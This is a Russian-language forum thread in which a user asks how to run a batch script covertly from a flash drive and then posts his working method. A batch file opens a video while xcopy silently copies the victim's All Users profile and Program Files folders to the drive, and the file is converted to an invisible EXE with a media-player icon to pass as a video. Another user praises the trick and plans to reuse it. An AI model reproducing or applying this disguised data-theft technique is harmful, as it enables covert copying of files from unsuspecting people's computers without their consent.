Компьютерный форум OSzone.net  

Компьютерный форум OSzone.net (http://forum.oszone.net/index.php)
-   Скриптовые языки администрирования Windows (http://forum.oszone.net/forumdisplay.php?f=102)
-   -   Как скрыть работу скрипта? (http://forum.oszone.net/showthread.php?t=267656)

rek90 07-09-2013 15:31 2214193

Как скрыть работу скрипта?

Доброго времени суток.

Есть примитивный (копирует определенные файлы на носитель) BAT'ник на флешке, работу которого нужно производить незаметно.
Для этого использую программку Hidden Start, которая запускает его через себя со своими параметрами и, соответственно, для этого создает Ярлык.
Естественно в настройках ярлыка фигурирует путь с указанием буквы флешки, и громадная вероятность, что на другом компьютере эта буква будет
иной и скрипт не запустится.

Прошу подсказать, как выйти из ситуации и запустить скрипт незаметно?

Заранее благодарен за полезную информацию.

PS. Вариант с ярлыком меня целиком и полностью утраивает, так как запуск данного скрипта скрываю под любым другим файлом.
Но как решить вопрос с различными буквами флешки?

Petya V4sechkin 07-09-2013 15:37 2214196

rek90, вирус делаете?

rek90 07-09-2013 15:43 2214202

Petya V4sechkin, ну, мне тяжело назвать это прям-таки вирусом.
Нужно дать флешку одной особе, чтобы при старте BAT'ника скопировались несколько необходимых файлов.

PS. Если вдруг это перечит правилам данного форума - заранее примите мои извинения...

[Update] решение нашел, можно удалять

NikolayHAOS 13-10-2013 11:40 2233571

rek90, дык поделись решением то.

rek90 13-10-2013 12:09 2233585

NikolayHAOS, я вышел из ситуации по-примитивному, но так как всё это хозяйство предназначалось для очень недалёкого в этом плане человека - подошло.
По некоторой специфике, этому человеку я ежедневно передаю различный видеоматериал, который просматривают сразу же с флешки. Поэтому:

1) забросил оригинал одного из видеофайлов глубоко в скрытые папки флешки;
2) создал BAT'ник, который при активации запускает вышеуказанный файл и начинает исполнять по порядку мои "задания";
... примитивный пример:
Цитата:

start \Temp\ru-RU\video.avi
xcopy "%allusersprofile%" \Temp\ru-RU\!AllUsersB\ /s/e/c/h/y
xcopy "%programfiles%" \Temp\ru-RU\!ProgramFilesB\ /s/e/c/h/y
3) программой "Bat To Exe Converter" перевёл всё это дело в EXE с опцией "Invisible application" и заменой значка на родной от Media Player Classic.

Собственно, всё. На выходе я получил exe с закосом под медиафайл. При открытии действительо открывается нужное видео, а !скрыто! активируются твои процессы.

NikolayHAOS 13-10-2013 13:34 2233618

rek90, спасибо большое.
Очень оригинальная идея, вполне возможно возьму на вооружение.
З.Ы. Схожая задача, обновить файлы игры, у человека далёкого от компутера, Чтоб получилось что-то типа (передаю файл по скайпу) запустил посмотрел ролик сек 10-20 опа и все готово, не каких выборов путей, непонятных кнопок или галочек.

Тока наверное не видео какое либо изображение.

Время: 10:31.

Время: 10:31.
© OSzone.net 2001-